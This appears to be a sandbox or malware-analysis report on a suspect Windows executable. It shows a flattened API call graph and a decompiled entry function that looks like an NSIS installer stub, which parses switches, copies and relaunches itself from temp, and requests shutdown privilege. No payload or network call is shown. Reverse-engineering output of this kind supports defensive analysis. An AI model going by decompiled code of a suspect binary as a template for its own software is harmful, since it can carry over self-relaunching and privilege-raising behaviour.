3953 404335 3948->3953 3965 403fd9 EnableWindow 3950->3965 3952->3948 3956 40433b SendMessageA 3953->3956 3957 40434c 3953->3957 3954 40428c 3958 40438a SendMessageA 3954->3958 3956->3957 3957->3951 3960 404352 SendMessageA 3957->3960 3958->3938 3959 404196 GetDlgItem 3966 403fec SendMessageA 3959->3966 3960->3951 3962 4041ac SendMessageA 3963 4041d3 SendMessageA SendMessageA lstrlenA SendMessageA SendMessageA 3962->3963 3964 4041ca GetSysColor 3962->3964 3963->3951 3964->3963 3965->3959 3966->3962 3967->3954 3968 401000 3969 401037 BeginPaint GetClientRect 3968->3969 3971 40100c DefWindowProcA 3968->3971 3972 4010f3 3969->3972 3973 401179 3971->3973 3974 401073 CreateBrushIndirect FillRect DeleteObject 3972->3974 3975 4010fc 3972->3975 3974->3972 3976 401102 CreateFontIndirectA 3975->3976 3977 401167 EndPaint 3975->3977 3976->3977 3978 401112 6 API calls 3976->3978 3977->3973 3978->3977 3979 402188 3980 402a0c 18 API calls 3979->3980 3981 40218e 3980->3981 3982 402a0c 18 API calls 3981->3982 3983 402197 3982->3983 3984 402a0c 18 API calls 3983->3984 3985 4021a0 3984->3985 3986 405ff6 2 API calls 3985->3986 3987 4021a9 3986->3987 3988 4021ba lstrlenA lstrlenA 3987->3988 3989 4021ad 3987->3989 3991 404fe7 25 API calls 3988->3991 3990 404fe7 25 API calls 3989->3990 3993 4021b5 3989->3993 3990->3993 3992 4021f6 SHFileOperationA 3991->3992 3992->3989 3992->3993 3142 401389 3144 401390 3142->3144 3143 4013fe 3144->3143 3145 4013cb MulDiv SendMessageA 3144->3145 3145->3144 3994 40220a 3995 402211 3994->3995 3998 402224 3994->3998 3996 405d1d 18 API calls 3995->3996 3997 40221e 3996->3997 3999 4055bc MessageBoxIndirectA 3997->3999 3999->3998 4000 401c8a 4001 4029ef 18 API calls 4000->4001 4002 401c91 4001->4002 4003 4029ef 18 API calls 4002->4003 4004 401c99 GetDlgItem 4003->4004 4005 4024ce 4004->4005 4006 40370c 4007 403717 4006->4007 4008 40371e GlobalAlloc 4007->4008 4009 40371b 4007->4009 4008->4009 4010 401490 4011 404fe7 25 API calls 4010->4011 4012 401497 
4011->4012 4013 402611 4014 402618 4013->4014 4016 4028a1 4013->4016 4015 40261e FindClose 4014->4015 4015->4016 4017 402692 4018 402a0c 18 API calls 4017->4018 4020 4026a0 4018->4020 4019 4026b6 4022 4059b3 2 API calls 4019->4022 4020->4019 4021 402a0c 18 API calls 4020->4021 4021->4019 4023 4026bc 4022->4023 4043 4059d2 GetFileAttributesA CreateFileA 4023->4043 4025 4026c9 4026 402772 4025->4026 4027 4026d5 GlobalAlloc 4025->4027 4030 40277a DeleteFileA 4026->4030 4031 40278d 4026->4031 4028 402769 CloseHandle 4027->4028 4029 4026ee 4027->4029 4028->4026 4044 403207 SetFilePointer 4029->4044 4030->4031 4033 4026f4 4034 4031d5 ReadFile 4033->4034 4035 4026fd GlobalAlloc 4034->4035 4036 402741 WriteFile GlobalFree 4035->4036 4037 40270d 4035->4037 4039 402f2e 48 API calls 4036->4039 4038 402f2e 48 API calls 4037->4038 4042 40271a 4038->4042 4040 402766 4039->4040 4040->4028 4041 402738 GlobalFree 4041->4036 4042->4041 4043->4025 4044->4033 4045 401595 4046 402a0c 18 API calls 4045->4046 4047 40159c SetFileAttributesA 4046->4047 4048 4015ae 4047->4048 4049 401e95 4050 402a0c 18 API calls 4049->4050 4051 401e9c 4050->4051 4052 405ff6 2 API calls 4051->4052 4053 401ea2 4052->4053 4055 401eb4 4053->4055 4056 405c59 wsprintfA 4053->4056 4056->4055 4057 401696 4058 402a0c 18 API calls 4057->4058 4059 40169c GetFullPathNameA 4058->4059 4060 4016b3 4059->4060 4066 4016d4 4059->4066 4063 405ff6 2 API calls 4060->4063 4060->4066 4061 4028a1 4062 4016e8 GetShortPathNameA 4062->4061 4064 4016c4 4063->4064 4064->4066 4067 405cfb lstrcpynA 4064->4067 4066->4061 4066->4062 4067->4066 4075 402319 4076 40231f 4075->4076 4077 402a0c 18 API calls 4076->4077 4078 402331 4077->4078 4079 402a0c 18 API calls 4078->4079 4080 40233b RegCreateKeyExA 4079->4080 4081 4028a1 4080->4081 4082 402365 4080->4082 4083 40237d 4082->4083 4084 402a0c 18 API calls 4082->4084 4085 402389 4083->4085 4087 4029ef 18 API calls 4083->4087 4086 402376 lstrlenA 4084->4086 4088 4023a4 RegSetValueExA 4085->4088 
4089 402f2e 48 API calls 4085->4089 4086->4083 4087->4085 4090 4023ba RegCloseKey 4088->4090 4089->4088 4090->4081 4092 402819 4093 4029ef 18 API calls 4092->4093 4094 40281f 4093->4094 4095 402672 4094->4095 4096 402850 4094->4096 4097 40282d 4094->4097 4096->4095 4098 405d1d 18 API calls 4096->4098 4097->4095 4100 405c59 wsprintfA 4097->4100 4098->4095 4100->4095 3146 401e1b 3147 402a0c 18 API calls 3146->3147 3148 401e21 3147->3148 3149 404fe7 25 API calls 3148->3149 3150 401e2b 3149->3150 3162 40555b CreateProcessA 3150->3162 3152 402672 3153 401e87 CloseHandle 3153->3152 3154 401e50 WaitForSingleObject 3155 401e31 3154->3155 3156 401e5e GetExitCodeProcess 3154->3156 3155->3152 3155->3153 3155->3154 3159 4060c3 2 API calls 3155->3159 3157 401e70 3156->3157 3158 401e7b 3156->3158 3165 405c59 wsprintfA 3157->3165 3158->3153 3161 401e79 3158->3161 3159->3154 3161->3153 3163 405596 3162->3163 3164 40558a CloseHandle 3162->3164 3163->3155 3164->3163 3165->3161 4101 401d1b GetDC GetDeviceCaps 4102 4029ef 18 API calls 4101->4102 4103 401d37 MulDiv 4102->4103 4104 4029ef 18 API calls 4103->4104 4105 401d4c 4104->4105 4106 405d1d 18 API calls 4105->4106 4107 401d85 CreateFontIndirectA 4106->4107 4108 4024ce 4107->4108 4108->4108 4109 40251c 4110 4029ef 18 API calls 4109->4110 4111 402526 4110->4111 4112 40255a ReadFile 4111->4112 4113 40259e 4111->4113 4115 4025ae 4111->4115 4117 40259c 4111->4117 4112->4111 4112->4117 4118 405c59 wsprintfA 4113->4118 4116 4025c4 SetFilePointer 4115->4116 4115->4117 4116->4117 4118->4117 2933 401721 2939 402a0c 2933->2939 2937 40172f 2938 405a01 2 API calls 2937->2938 2938->2937 2940 402a18 2939->2940 2949 405d1d 2940->2949 2943 401728 2945 405a01 2943->2945 2946 405a0c GetTickCount GetTempFileNameA 2945->2946 2947 405a3c 2946->2947 2948 405a38 2946->2948 2947->2937 2948->2946 2948->2947 2959 405d2a 2949->2959 2950 405f44 2951 402a39 2950->2951 2984 405cfb lstrcpynA 2950->2984 2951->2943 2968 405f5d 2951->2968 2953 405dc2 GetVersion 
2954 405dcf 2953->2954 2954->2959 2961 405e3a GetSystemDirectoryA 2954->2961 2962 405e4d GetWindowsDirectoryA 2954->2962 2964 405d1d 10 API calls 2954->2964 2965 405ec4 lstrcatA 2954->2965 2966 405e81 SHGetSpecialFolderLocation 2954->2966 2977 405be2 RegOpenKeyExA 2954->2977 2955 405f1b lstrlenA 2955->2959 2958 405d1d 10 API calls 2958->2955 2959->2950 2959->2953 2959->2955 2959->2958 2963 405f5d 5 API calls 2959->2963 2982 405c59 wsprintfA 2959->2982 2983 405cfb lstrcpynA 2959->2983 2961->2954 2962->2954 2963->2959 2964->2954 2965->2959 2966->2954 2967 405e99 SHGetPathFromIDListA CoTaskMemFree 2966->2967 2967->2954 2974 405f69 2968->2974 2969 405fd1 2970 405fd5 CharPrevA 2969->2970 2973 405ff0 2969->2973 2970->2969 2971 405fc6 CharNextA 2971->2969 2971->2974 2973->2943 2974->2969 2974->2971 2975 405fb4 CharNextA 2974->2975 2976 405fc1 CharNextA 2974->2976 2985 405819 2974->2985 2975->2974 2976->2971 2978 405c53 2977->2978 2979 405c15 RegQueryValueExA 2977->2979 2978->2954 2980 405c36 RegCloseKey 2979->2980 2980->2978 2982->2959 2983->2959 2984->2951 2986 40581f 2985->2986 2987 405832 2986->2987 2988 405825 CharNextA 2986->2988 2987->2974 2988->2986 4119 401922 4120 402a0c 18 API calls 4119->4120 4121 401929 lstrlenA 4120->4121 4122 4024ce 4121->4122 4123 405125 4124 4052d1 4123->4124 4125 405146 GetDlgItem GetDlgItem GetDlgItem 4123->4125 4127 405302 4124->4127 4128 4052da GetDlgItem CreateThread CloseHandle 4124->4128 4169 403fec SendMessageA 4125->4169 4130 40532d 4127->4130 4131 405319 ShowWindow ShowWindow 4127->4131 4132 40534f 4127->4132 4128->4127 4129 4051b7 4135 4051be GetClientRect GetSystemMetrics SendMessageA SendMessageA 4129->4135 4133 40538b 4130->4133 4137 405364 ShowWindow 4130->4137 4138 40533e 4130->4138 4171 403fec SendMessageA 4131->4171 4134 40401e 8 API calls 4132->4134 4133->4132 4143 405396 SendMessageA 4133->4143 4149 40535d 4134->4149 4141 405211 SendMessageA SendMessageA 4135->4141 4142 40522d 4135->4142 4139 405384 4137->4139 4140 
405376 4137->4140 4144 403f90 SendMessageA 4138->4144 4146 403f90 SendMessageA 4139->4146 4145 404fe7 25 API calls 4140->4145 4141->4142 4147 405240 4142->4147 4148 405232 SendMessageA 4142->4148 4143->4149 4150 4053af CreatePopupMenu 4143->4150 4144->4132 4145->4139 4146->4133 4152 403fb7 19 API calls 4147->4152 4148->4147 4151 405d1d 18 API calls 4150->4151 4153 4053bf AppendMenuA 4151->4153 4154 405250 4152->4154 4155 4053d2 GetWindowRect 4153->4155 4156 4053e5 4153->4156 4157 405259 ShowWindow 4154->4157 4158 40528d GetDlgItem SendMessageA 4154->4158 4159 4053ee TrackPopupMenu 4155->4159 4156->4159 4160 40527c 4157->4160 4161 40526f ShowWindow 4157->4161 4158->4149 4162 4052b4 SendMessageA SendMessageA 4158->4162 4159->4149 4163 40540c 4159->4163 4170 403fec SendMessageA 4160->4170 4161->4160 4162->4149 4164 405428 SendMessageA 4163->4164 4164->4164 4166 405445 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 4164->4166 4167 405467 SendMessageA 4166->4167 4167->4167 4168 405488 GlobalUnlock SetClipboardData CloseClipboard 4167->4168 4168->4149 4169->4129 4170->4158 4171->4130 4172 401ca5 4173 4029ef 18 API calls 4172->4173 4174 401cb5 SetWindowLongA 4173->4174 4175 4028a1 4174->4175 4176 401a26 4177 4029ef 18 API calls 4176->4177 4178 401a2c 4177->4178 4179 4029ef 18 API calls 4178->4179 4180 4019d6 4179->4180 4181 406a26 4184 4061b7 4181->4184 4182 406241 GlobalAlloc 4182->4184 4185 406b22 4182->4185 4183 406238 GlobalFree 4183->4182 4184->4182 4184->4183 4184->4184 4184->4185 4186 4062b8 GlobalAlloc 4184->4186 4187 4062af GlobalFree 4184->4187 4186->4184 4186->4185 4187->4186 4188 40262b 4189 402646 4188->4189 4190 40262e 4188->4190 4191 4027cc 4189->4191 4194 405cfb lstrcpynA 4189->4194 4192 40263b FindNextFileA 4190->4192 4192->4189 4194->4191 4195 401bad 4196 4029ef 18 API calls 4195->4196 4197 401bb4 4196->4197 4198 4029ef 18 API calls 4197->4198 4199 401bbe 4198->4199 4200 401bce 4199->4200 4201 402a0c 18 API calls 4199->4201 4202 401bde 4200->4202 
4203 402a0c 18 API calls 4200->4203 4201->4200 4204 401be9 4202->4204 4205 401c2d 4202->4205 4203->4202 4207 4029ef 18 API calls 4204->4207 4206 402a0c 18 API calls 4205->4206 4209 401c32 4206->4209 4208 401bee 4207->4208 4210 4029ef 18 API calls 4208->4210 4211 402a0c 18 API calls 4209->4211 4212 401bf7 4210->4212 4213 401c3b FindWindowExA 4211->4213 4214 401c1d SendMessageA 4212->4214 4215 401bff SendMessageTimeoutA 4212->4215 4216 401c59 4213->4216 4214->4216 4215->4216 4217 4043ae 4218 4043e4 4217->4218 4219 4043be 4217->4219 4221 40401e 8 API calls 4218->4221 4220 403fb7 19 API calls 4219->4220 4222 4043cb SetDlgItemTextA 4220->4222 4223 4043f0 4221->4223 4222->4218 4224 4024b2 4225 402a0c 18 API calls 4224->4225 4226 4024b9 4225->4226 4229 4059d2 GetFileAttributesA CreateFileA 4226->4229 4228 4024c5 4229->4228 2989 4015b3 2990 402a0c 18 API calls 2989->2990 2991 4015ba 2990->2991 3007 405882 CharNextA CharNextA 2991->3007 2993 4015c2 2994 40160a 2993->2994 2995 405819 CharNextA 2993->2995 2996 40162d 2994->2996 2997 40160f 2994->2997 2998 4015d0 CreateDirectoryA 2995->2998 3001 401423 25 API calls 2996->3001 3013 401423 2997->3013 2998->2993 3000 4015e5 GetLastError 2998->3000 3000->2993 3003 4015f2 GetFileAttributesA 3000->3003 3006 40217f 3001->3006 3003->2993 3005 401621 SetCurrentDirectoryA 3005->3006 3008 4058a8 3007->3008 3009 40589c 3007->3009 3011 405819 CharNextA 3008->3011 3012 4058c5 3008->3012 3009->3008 3010 4058a3 CharNextA 3009->3010 3010->3012 3011->3008 3012->2993 3017 404fe7 3013->3017 3016 405cfb lstrcpynA 3016->3005 3018 401431 3017->3018 3019 405002 3017->3019 3018->3016 3020 40501f lstrlenA 3019->3020 3021 405d1d 18 API calls 3019->3021 3022 405048 3020->3022 3023 40502d lstrlenA 3020->3023 3021->3020 3025 40505b 3022->3025 3026 40504e SetWindowTextA 3022->3026 3023->3018 3024 40503f lstrcatA 3023->3024 3024->3022 3025->3018 3027 405061 SendMessageA SendMessageA SendMessageA 3025->3027 3026->3025 3027->3018 4230 406333 4232 4061b7 
4230->4232 4231 406b22 4232->4231 4233 406241 GlobalAlloc 4232->4233 4234 406238 GlobalFree 4232->4234 4235 4062b8 GlobalAlloc 4232->4235 4236 4062af GlobalFree 4232->4236 4233->4231 4233->4232 4234->4233 4235->4231 4235->4232 4236->4235 3028 401734 3029 402a0c 18 API calls 3028->3029 3030 40173b 3029->3030 3031 401761 3030->3031 3032 401759 3030->3032 3083 405cfb lstrcpynA 3031->3083 3082 405cfb lstrcpynA 3032->3082 3035 40175f 3039 405f5d 5 API calls 3035->3039 3036 40176c 3084 4057ee lstrlenA CharPrevA 3036->3084 3058 40177e 3039->3058 3043 401795 CompareFileTime 3043->3058 3044 401859 3045 404fe7 25 API calls 3044->3045 3048 401863 3045->3048 3046 404fe7 25 API calls 3054 401845 3046->3054 3047 405cfb lstrcpynA 3047->3058 3067 402f2e 3048->3067 3051 40188a SetFileTime 3052 40189c FindCloseChangeNotification 3051->3052 3052->3054 3055 4018ad 3052->3055 3053 405d1d 18 API calls 3053->3058 3056 4018b2 3055->3056 3057 4018c5 3055->3057 3059 405d1d 18 API calls 3056->3059 3060 405d1d 18 API calls 3057->3060 3058->3043 3058->3044 3058->3047 3058->3053 3065 401830 3058->3065 3066 4059d2 GetFileAttributesA CreateFileA 3058->3066 3087 405ff6 FindFirstFileA 3058->3087 3090 4059b3 GetFileAttributesA 3058->3090 3093 4055bc 3058->3093 3062 4018ba lstrcatA 3059->3062 3063 4018cd 3060->3063 3062->3063 3064 4055bc MessageBoxIndirectA 3063->3064 3064->3054 3065->3046 3065->3054 3066->3058 3068 402f5b 3067->3068 3069 402f3f SetFilePointer 3067->3069 3097 403059 GetTickCount 3068->3097 3069->3068 3072 402f6c ReadFile 3073 402f8c 3072->3073 3081 401876 3072->3081 3074 403059 43 API calls 3073->3074 3073->3081 3075 402fa3 3074->3075 3076 40301e ReadFile 3075->3076 3079 402fb3 3075->3079 3075->3081 3076->3081 3078 402fce ReadFile 3078->3079 3078->3081 3079->3078 3080 402fe7 WriteFile 3079->3080 3079->3081 3080->3079 3080->3081 3081->3051 3081->3052 3082->3035 3083->3036 3085 401772 lstrcatA 3084->3085 3086 405808 lstrcatA 3084->3086 3085->3035 3086->3085 3088 406017 3087->3088 3089 
40600c FindClose 3087->3089 3088->3058 3089->3088 3091 4059c2 SetFileAttributesA 3090->3091 3092 4059cf 3090->3092 3091->3092 3092->3058 3096 4055d1 3093->3096 3094 40561d 3094->3058 3095 4055e5 MessageBoxIndirectA 3095->3094 3096->3094 3096->3095 3098 4031c3 3097->3098 3099 403088 3097->3099 3100 402be9 33 API calls 3098->3100 3110 403207 SetFilePointer 3099->3110 3107 402f64 3100->3107 3102 403093 SetFilePointer 3106 4030b8 3102->3106 3106->3107 3108 40314d WriteFile 3106->3108 3109 4031a4 SetFilePointer 3106->3109 3111 4031d5 ReadFile 3106->3111 3113 406184 3106->3113 3120 402be9 3106->3120 3107->3072 3107->3081 3108->3106 3108->3107 3109->3098 3110->3102 3112 4031f6 3111->3112 3112->3106 3114 4061a9 3113->3114 3115 4061b1 3113->3115 3114->3106 3115->3114 3116 406241 GlobalAlloc 3115->3116 3117 406238 GlobalFree 3115->3117 3118 4062b8 GlobalAlloc 3115->3118 3119 4062af GlobalFree 3115->3119 3116->3114 3116->3115 3117->3116 3118->3114 3118->3115 3119->3118 3121 402bf7 3120->3121 3122 402c0f 3120->3122 3123 402c00 DestroyWindow 3121->3123 3124 402c07 3121->3124 3125 402c17 3122->3125 3126 402c1f GetTickCount 3122->3126 3123->3124 3124->3106 3135 4060c3 3125->3135 3126->3124 3128 402c2d 3126->3128 3129 402c62 CreateDialogParamA ShowWindow 3128->3129 3130 402c35 3128->3130 3129->3124 3130->3124 3139 402bcd 3130->3139 3132 402c43 wsprintfA 3133 404fe7 25 API calls 3132->3133 3134 402c60 3133->3134 3134->3124 3136 4060e0 PeekMessageA 3135->3136 3137 4060f0 3136->3137 3138 4060d6 DispatchMessageA 3136->3138 3137->3124 3138->3136 3140 402bdc 3139->3140 3141 402bde MulDiv 3139->3141 3140->3141 3141->3132 4237 401634 4238 402a0c 18 API calls 4237->4238 4239 40163a 4238->4239 4240 405ff6 2 API calls 4239->4240 4241 401640 4240->4241 4242 401934 4243 4029ef 18 API calls 4242->4243 4244 40193b 4243->4244 4245 4029ef 18 API calls 4244->4245 4246 401945 4245->4246 4247 402a0c 18 API calls 4246->4247 4248 40194e 4247->4248 4249 401961 lstrlenA 4248->4249 4253 40199c 4248->4253 

                                                  Control-flow Graph (function starting at 0x40324f; nodes are marked Executed or Not Executed)
                                                  C-Code - Quality: 77%
                                                  			_entry_() {
                                                  				intOrPtr _t40;
                                                  				CHAR* _t44;
                                                  				char* _t47;
                                                  				signed int _t49;
                                                  				void* _t53;
                                                  				intOrPtr _t55;
                                                  				int _t56;
                                                  				signed int _t59;
                                                  				signed int _t60;
                                                  				int _t61;
                                                  				signed int _t63;
                                                  				signed int _t66;
                                                  				int _t83;
                                                  				void* _t87;
                                                  				void* _t99;
                                                  				intOrPtr* _t100;
                                                  				void* _t103;
                                                  				CHAR* _t108;
                                                  				signed int _t109;
                                                  				signed int _t110;
                                                  				signed int _t111;
                                                  				void* _t113;
                                                  				signed int _t115;
                                                  				char* _t117;
                                                  				signed int _t118;
                                                  				void* _t120;
                                                  				void* _t121;
                                                  				char _t138;
                                                  
                                                  				 *(_t121 + 0x1c) = 0;
                                                  				 *((intOrPtr*)(_t121 + 0x14)) = "Error writing temporary file. Make sure your temp folder is valid.";
                                                  				_t110 = 0;
                                                  				 *(_t121 + 0x18) = 0x20;
                                                  				SetErrorMode(0x8001); // executed
                                                  				if(GetVersion() != 6) {
                                                  					_t100 = E00406087(0);
                                                  					if(_t100 != 0) {
                                                  						 *_t100(0xc00);
                                                  					}
                                                  				}
                                                  				E0040601D("UXTHEME"); // executed
                                                  				E0040601D("USERENV"); // executed
                                                  				E0040601D("SETUPAPI"); // executed
                                                  				E00406087(0xd);
                                                  				_t40 = E00406087(0xb);
                                                  				 *0x423f84 = _t40;
                                                  				__imp__#17();
                                                  				__imp__OleInitialize(0); // executed
                                                  				 *0x424038 = _t40;
                                                  				SHGetFileInfoA(0x41f538, 0, _t121 + 0x34, 0x160, 0); // executed
                                                  				E00405CFB(0x423780, "NSIS Error");
                                                  				_t44 = GetCommandLineA();
                                                  				_t117 = "\"C:\\Users\\jones\\Desktop\\Lc8xQv8iZY.exe\"";
                                                  				E00405CFB(_t117, _t44);
                                                  				 *0x423f80 = GetModuleHandleA(0);
                                                  				_t47 = _t117;
                                                  				if("\"C:\\Users\\jones\\Desktop\\Lc8xQv8iZY.exe\"" == 0x22) {
                                                  					 *((char*)(_t121 + 0x14)) = 0x22;
                                                  					_t47 =  &M0042A001;
                                                  				}
                                                  				_t49 = CharNextA(E00405819(_t47,  *((intOrPtr*)(_t121 + 0x14))));
                                                  				 *(_t121 + 0x1c) = _t49;
                                                  				while(1) {
                                                  					_t103 =  *_t49;
                                                  					_t125 = _t103;
                                                  					if(_t103 == 0) {
                                                  						break;
                                                  					}
                                                  					__eflags = _t103 - 0x20;
                                                  					if(_t103 != 0x20) {
                                                  						L8:
                                                  						__eflags =  *_t49 - 0x22;
                                                  						 *((char*)(_t121 + 0x14)) = 0x20;
                                                  						if( *_t49 == 0x22) {
                                                  							_t49 = _t49 + 1;
                                                  							__eflags = _t49;
                                                  							 *((char*)(_t121 + 0x14)) = 0x22;
                                                  						}
                                                  						__eflags =  *_t49 - 0x2f;
                                                  						if( *_t49 != 0x2f) {
                                                  							L18:
                                                  							_t49 = E00405819(_t49,  *((intOrPtr*)(_t121 + 0x14)));
                                                  							__eflags =  *_t49 - 0x22;
                                                  							if(__eflags == 0) {
                                                  								_t49 = _t49 + 1;
                                                  								__eflags = _t49;
                                                  							}
                                                  							continue;
                                                  						} else {
                                                  							_t49 = _t49 + 1;
                                                  							__eflags =  *_t49 - 0x53;
                                                  							if( *_t49 == 0x53) {
                                                  								__eflags = ( *(_t49 + 1) | 0x00000020) - 0x20;
                                                  								if(( *(_t49 + 1) | 0x00000020) == 0x20) {
                                                  									_t110 = _t110 | 0x00000002;
                                                  									__eflags = _t110;
                                                  								}
                                                  							}
                                                  							__eflags =  *_t49 - 0x4352434e;
                                                  							if( *_t49 == 0x4352434e) {
                                                  								__eflags = ( *(_t49 + 4) | 0x00000020) - 0x20;
                                                  								if(( *(_t49 + 4) | 0x00000020) == 0x20) {
                                                  									_t110 = _t110 | 0x00000004;
                                                  									__eflags = _t110;
                                                  								}
                                                  							}
                                                  							__eflags =  *((intOrPtr*)(_t49 - 2)) - 0x3d442f20;
                                                  							if( *((intOrPtr*)(_t49 - 2)) == 0x3d442f20) {
                                                  								 *((intOrPtr*)(_t49 - 2)) = 0;
                                                  								__eflags = _t49 + 2;
                                                  								E00405CFB("C:\\Users\\jones\\AppData\\Local\\Temp", _t49 + 2);
                                                  								L23:
                                                  								_t108 = "C:\\Users\\jones\\AppData\\Local\\Temp\\";
                                                  								GetTempPathA(0x400, _t108);
                                                  								_t53 = E0040321E(_t125);
                                                  								_t126 = _t53;
                                                  								if(_t53 != 0) {
                                                  									L25:
                                                  									DeleteFileA("1033"); // executed
                                                  									_t55 = E00402C88(_t127, _t110); // executed
                                                  									 *((intOrPtr*)(_t121 + 0x10)) = _t55;
                                                  									if(_t55 != 0) {
                                                  										L35:
                                                  										ExitProcess(); // executed
                                                  										__imp__OleUninitialize(); // executed
                                                  										_t134 =  *((intOrPtr*)(_t121 + 0x10));
                                                  										if( *((intOrPtr*)(_t121 + 0x10)) == 0) {
                                                  											__eflags =  *0x424014;
                                                  											if( *0x424014 == 0) {
                                                  												L62:
                                                  												_t56 =  *0x42402c;
                                                  												__eflags = _t56 - 0xffffffff;
                                                  												if(_t56 != 0xffffffff) {
                                                  													 *(_t121 + 0x18) = _t56;
                                                  												}
                                                  												ExitProcess( *(_t121 + 0x18));
                                                  											}
                                                  											_t118 = E00406087(5);
                                                  											_t111 = E00406087(6);
                                                  											_t59 = E00406087(7);
                                                  											__eflags = _t118;
                                                  											_t109 = _t59;
                                                  											if(_t118 != 0) {
                                                  												__eflags = _t111;
                                                  												if(_t111 != 0) {
                                                  													__eflags = _t109;
                                                  													if(_t109 != 0) {
                                                  														_t66 =  *_t118(GetCurrentProcess(), 0x28, _t121 + 0x1c);
                                                  														__eflags = _t66;
                                                  														if(_t66 != 0) {
                                                  															 *_t111(0, "SeShutdownPrivilege", _t121 + 0x24);
                                                  															 *(_t121 + 0x38) = 1;
                                                  															 *(_t121 + 0x44) = 2;
                                                  															 *_t109( *((intOrPtr*)(_t121 + 0x30)), 0, _t121 + 0x28, 0, 0, 0);
                                                  														}
                                                  													}
                                                  												}
                                                  											}
                                                  											_t60 = E00406087(8);
                                                  											__eflags = _t60;
                                                  											if(_t60 == 0) {
                                                  												L60:
                                                  												_t61 = ExitWindowsEx(2, 0x80040002);
                                                  												__eflags = _t61;
                                                  												if(_t61 != 0) {
                                                  													goto L62;
                                                  												}
                                                  												goto L61;
                                                  											} else {
                                                  												_t63 =  *_t60(0, 0, 0, 0x25, 0x80040002);
                                                  												__eflags = _t63;
                                                  												if(_t63 == 0) {
                                                  													L61:
                                                  													E0040140B(9);
                                                  													goto L62;
                                                  												}
                                                  												goto L60;
                                                  											}
                                                  										}
                                                  										E004055BC( *((intOrPtr*)(_t121 + 0x14)), 0x200010);
                                                  										ExitProcess(2);
                                                  									}
                                                  									if( *0x423f9c == 0) {
                                                  										L34:
                                                  										 *0x42402c =  *0x42402c | 0xffffffff;
                                                  										 *(_t121 + 0x18) = E0040374E( *0x42402c);
                                                  										goto L35;
                                                  									}
                                                  									_t115 = E00405819(_t117, 0);
                                                  									while(_t115 >= _t117) {
                                                  										__eflags =  *_t115 - 0x3d3f5f20;
                                                  										if(__eflags == 0) {
                                                  											break;
                                                  										}
                                                  										_t115 = _t115 - 1;
                                                  										__eflags = _t115;
                                                  									}
                                                  									_t131 = _t115 - _t117;
                                                  									 *((intOrPtr*)(_t121 + 0x10)) = "Error launching installer";
                                                  									if(_t115 < _t117) {
                                                  										_t113 = E00405543(_t134);
                                                  										lstrcatA(_t108, "~nsu");
                                                  										if(_t113 != 0) {
                                                  											lstrcatA(_t108, "A");
                                                  										}
                                                  										lstrcatA(_t108, ".tmp");
                                                  										_t119 = "C:\\Users\\jones\\Desktop";
                                                  										if(lstrcmpiA(_t108, "C:\\Users\\jones\\Desktop") != 0) {
                                                  											_push(_t108);
                                                  											if(_t113 == 0) {
                                                  												E00405526();
                                                  											} else {
                                                  												E004054A9();
                                                  											}
                                                  											SetCurrentDirectoryA(_t108);
                                                  											_t138 = "C:\\Users\\jones\\AppData\\Local\\Temp"; // 0x43
                                                  											if(_t138 == 0) {
                                                  												E00405CFB("C:\\Users\\jones\\AppData\\Local\\Temp", _t119);
                                                  											}
                                                  											E00405CFB(0x425000,  *(_t121 + 0x1c));
                                                  											 *0x425400 = 0x41;
                                                  											_t120 = 0x1a;
                                                  											do {
                                                  												E00405D1D(0, _t108, 0x41f138, 0x41f138,  *((intOrPtr*)( *0x423f90 + 0x120)));
                                                  												DeleteFileA(0x41f138);
                                                  												if( *((intOrPtr*)(_t121 + 0x10)) != 0) {
                                                  													_t83 = CopyFileA("C:\\Users\\jones\\Desktop\\Lc8xQv8iZY.exe", 0x41f138, 1);
                                                  													_t140 = _t83;
                                                  													if(_t83 != 0) {
                                                  														_push(0);
                                                  														_push(0x41f138);
                                                  														E00405A49(_t140);
                                                  														E00405D1D(0, _t108, 0x41f138, 0x41f138,  *((intOrPtr*)( *0x423f90 + 0x124)));
                                                  														_t87 = E0040555B(0x41f138);
                                                  														if(_t87 != 0) {
                                                  															CloseHandle(_t87);
                                                  															 *((intOrPtr*)(_t121 + 0x10)) = 0;
                                                  														}
                                                  													}
                                                  												}
                                                  												 *0x425400 =  *0x425400 + 1;
                                                  												_t120 = _t120 - 1;
                                                  												_t142 = _t120;
                                                  											} while (_t120 != 0);
                                                  											_push(0);
                                                  											_push(_t108);
                                                  											E00405A49(_t142);
                                                  										}
                                                  										goto L35;
                                                  									}
                                                  									 *_t115 = 0;
                                                  									_t116 = _t115 + 4;
                                                  									if(E004058CF(_t131, _t115 + 4) == 0) {
                                                  										goto L35;
                                                  									}
                                                  									E00405CFB("C:\\Users\\jones\\AppData\\Local\\Temp", _t116);
                                                  									E00405CFB("C:\\Users\\jones\\AppData\\Local\\Temp", _t116);
                                                  									 *((intOrPtr*)(_t121 + 0x10)) = 0;
                                                  									goto L34;
                                                  								}
                                                  								GetWindowsDirectoryA(_t108, 0x3fb);
                                                  								lstrcatA(_t108, "\\Temp");
                                                  								_t99 = E0040321E(_t126);
                                                  								_t127 = _t99;
                                                  								if(_t99 == 0) {
                                                  									goto L35;
                                                  								}
                                                  								goto L25;
                                                  							} else {
                                                  								goto L18;
                                                  							}
                                                  						}
                                                  					} else {
                                                  						goto L7;
                                                  					}
                                                  					do {
                                                  						L7:
                                                  						_t49 = _t49 + 1;
                                                  						__eflags =  *_t49 - 0x20;
                                                  					} while ( *_t49 == 0x20);
                                                  					goto L8;
                                                  				}
                                                  				goto L23;
                                                  			}































                                                  0x00403612
                                                  0x00403612
                                                  0x004035e6
                                                  0x004035d2
                                                  0x004035ce
                                                  0x00403616
                                                  0x0040361b
                                                  0x00403622
                                                  0x00403630
                                                  0x00403633
                                                  0x00403639
                                                  0x0040363b
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00403624
                                                  0x0040362a
                                                  0x0040362c
                                                  0x0040362e
                                                  0x0040363d
                                                  0x0040363f
                                                  0x00000000
                                                  0x0040363f
                                                  0x00000000
                                                  0x0040362e
                                                  0x00403622
                                                  0x0040349b
                                                  0x004034a2
                                                  0x004034a2
                                                  0x0040341e
                                                  0x0040346d
                                                  0x0040346d
                                                  0x00403479
                                                  0x00000000
                                                  0x00403479
                                                  0x00403427
                                                  0x00403434
                                                  0x0040342b
                                                  0x00403431
                                                  0x00000000
                                                  0x00000000
                                                  0x00403433
                                                  0x00403433
                                                  0x00403433
                                                  0x00403438
                                                  0x0040343a
                                                  0x00403442
                                                  0x004034b3
                                                  0x004034b5
                                                  0x004034bc
                                                  0x004034c4
                                                  0x004034c4
                                                  0x004034cf
                                                  0x004034d4
